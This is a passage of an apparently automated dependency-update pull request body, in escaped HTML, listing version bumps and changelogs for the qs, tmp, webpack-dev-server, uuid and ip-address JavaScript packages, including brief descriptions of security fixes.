href=\"https://github.com/beaugunderson/ip-address/commit/f01d74267ed39f84521157e5f199edade9809f1e\"\u003e\u003ccode\u003ef01d742\u003c/code\u003e\u003c/a\u003e Add address-property predicates (private, ULA, loopback, link-local, etc.) (#...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/beaugunderson/ip-address/compare/v10.0.1...v10.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.2 to 6.13.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictDepth\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/511\"\u003e#511\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Tests] use \u003ccode\u003enpm audit\u003c/code\u003e instead of \u003ccode\u003eaud\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.5\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] fix regressions from robustness refactor\u003c/li\u003e\n\u003cli\u003e[actions] update reusable workflows\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.4\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: properly account for \u003ccode\u003estrictNullHandling\u003c/code\u003e when \u003ccode\u003eallowEmptyArrays\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog indentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: parse encoded square brackets (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/506\"\u003e#506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] add CII best practices badge\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: Disable \u003ccode\u003edecodeDotInKeys\u003c/code\u003e by default to restore previous behavior (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/501\"\u003e#501\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Performance] \u003ccode\u003eutils\u003c/code\u003e: Optimize performance under large data volumes, reduce memory usage, and speed up processing (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/502\"\u003e#502\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eutils\u003c/code\u003e: use \u003ccode\u003e+=\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e/\u003ccode\u003estringify\u003c/code\u003e: add \u003ccode\u003edecodeDotInKeys\u003c/code\u003e/\u003ccode\u003eencodeDotKeys\u003c/code\u003e options (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/488\"\u003e#488\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003eduplicates\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e/\u003ccode\u003estringify\u003c/code\u003e: add \u003ccode\u003eallowEmptyArrays\u003c/code\u003e option to allow [] in object values (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/487\"\u003e#487\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e/\u003ccode\u003estringify\u003c/code\u003e: move allowDots config logic to its own variable\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003estringify\u003c/code\u003e: move option-handling code into \u003ccode\u003enormalizeStringifyOptions\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] update readme, add logos (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/484\"\u003e#484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] \u003ccode\u003estringify\u003c/code\u003e: clarify default \u003ccode\u003earrayFormat\u003c/code\u003e behavior\u003c/li\u003e\n\u003cli\u003e[readme] fix line wrapping\u003c/li\u003e\n\u003cli\u003e[readme] remove dead badges\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[meta] make the dist build 50% smaller\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003esideEffects\u003c/code\u003e flag\u003c/li\u003e\n\u003cli\u003e[meta] run build in prepack, not prepublish\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003eparse\u003c/code\u003e: remove useless tests; add coverage\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Tests] use \u003ccode\u003emock-property\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: improve coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config \u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e, \u003ccode\u003ehas-override-mistake\u003c/code\u003e, \u003ccode\u003ehas-property-descriptors\u003c/code\u003e, \u003ccode\u003emock-property\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] pin \u003ccode\u003eglob\u003c/code\u003e, since v10.3.8+ requires a broken \u003ccode\u003ejackspeak\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5cf516c0dd557d85d5f18d4a916c96cd9cfc2305\"\u003e\u003ccode\u003e5cf516c\u003c/code\u003e\u003c/a\u003e v6.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/8d56df2c86ff7bb42c72329c827dacb14a74107d\"\u003e\u003ccode\u003e8d56df2\u003c/code\u003e\u003c/a\u003e [New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictDepth\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/c9a6694ccda24441e499106d88fb0c84756862b3\"\u003e\u003ccode\u003ec9a6694\u003c/code\u003e\u003c/a\u003e [Tests] use \u003ccode\u003enpm audit\u003c/code\u003e instead of \u003ccode\u003eaud\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f90cc35dd65c7099c35ae75d7a1a67aab85220e1\"\u003e\u003ccode\u003ef90cc35\u003c/code\u003e\u003c/a\u003e v6.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1bf9f7a7f5efb3888f3653137f90a96f32fe95ff\"\u003e\u003ccode\u003e1bf9f7a\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: properly account for \u003ccode\u003estrictNullHandling\u003c/code\u003e when \u003ccode\u003eallowEmptyArrays\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/7ebf48b42a4780b3b0b18f12be727bd57a49256b\"\u003e\u003ccode\u003e7ebf48b\u003c/code\u003e\u003c/a\u003e [meta] fix changelog indentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/d0dff11f06be1b2588e62865f5e4aa91f2dabafb\"\u003e\u003ccode\u003ed0dff11\u003c/code\u003e\u003c/a\u003e v6.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f0b8d032034933adcc60b5f83dbcb8cdfb868dbd\"\u003e\u003ccode\u003ef0b8d03\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/81835ff51d852c97e364eff78bbb8c58072aca71\"\u003e\u003ccode\u003e81835ff\u003c/code\u003e\u003c/a\u003e [Fix]: \u003ccode\u003eparse\u003c/code\u003e: parse encoded square brackets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/db47dccb5819fc10f616a1f036798e4788ae06a8\"\u003e\u003ccode\u003edb47dcc\u003c/code\u003e\u003c/a\u003e [readme] add CII best practices badge\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.2...v6.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tmp` from 0.2.5 to 0.2.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8ea1f37d75c67569e0f151448330d52f7babf211\"\u003e\u003ccode\u003e8ea1f37\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8f24f788a356b5d45c9bec894632bd4931338153\"\u003e\u003ccode\u003e8f24f78\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/ce787f37aaacccad921ae90990c9da33481fe59c\"\u003e\u003ccode\u003ece787f3\u003c/code\u003e\u003c/a\u003e Reject non-string prefix, postfix, template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/41f71598d03f104a67e0448a7cb9bd4efcdd5980\"\u003e\u003ccode\u003e41f7159\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429\"\u003e\u003ccode\u003eefa4a06\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/7ef2728ce0211b8110b2033dfe62eaf030341acf\"\u003e\u003ccode\u003e7ef2728\u003c/code\u003e\u003c/a\u003e Check for relative values\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/raszi/node-tmp/compare/v0.2.5...v0.2.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 13.0.0 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/releases\"\u003euuid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003edc4ddb8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003ef2c235f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003effa3138\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.1...v13.0.2\"\u003e13.0.2\u003c/a\u003e (2026-05-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ererelease to fix provenance. (\u003ca href=\"https://github.com/uuidjs/uuid/commit/49ccb35f78c0c4ce1409dd2f1d89f83caadba10b\"\u003e49ccb35\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebackport fix for GHSA-w5hq-g745-h8pq (\u003ca href=\"https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a\"\u003e9d27ddf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq\"\u003eGHSA-w5hq-g745-h8pq\u003c/a\u003e: \u003ccode\u003ev3()\u003c/code\u003e, \u003ccode\u003ev5()\u003c/code\u003e, and \u003ccode\u003ev6()\u003c/code\u003e did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid \u003ccode\u003eoffset\u003c/code\u003e was provided. A \u003ccode\u003eRangeError\u003c/code\u003e is now thrown if \u003ccode\u003eoffset \u0026lt; 0\u003c/code\u003e or \u003ccode\u003eoffset + 16 \u0026gt; buf.length\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecrypto\u003c/code\u003e is now expected to be globally defined (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/7c1ea087a8149b57380fc8bb7f68c3a215cb6e4b\"\u003e\u003ccode\u003e7c1ea08\u003c/code\u003e\u003c/a\u003e chore(main): release 14.0.0 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/926\"\u003e#926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34\"\u003e\u003ccode\u003e3d2c5b0\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003e\u003ccode\u003ef2c235f\u003c/code\u003e\u003c/a\u003e fix!: expect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/529ef0899f5dd503d2ee90d690585d63d78bc212\"\u003e\u003ccode\u003e529ef08\u003c/code\u003e\u003c/a\u003e chore: upgrade TypeScript and fixup types (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/927\"\u003e#927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/086fd7976f11433edf9ac80be876b3ad243fe087\"\u003e\u003ccode\u003e086fd79\u003c/code\u003e\u003c/a\u003e chore: update dependencies (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/933\"\u003e#933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003e\u003ccode\u003edc4ddb8\u003c/code\u003e\u003c/a\u003e feat!: drop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 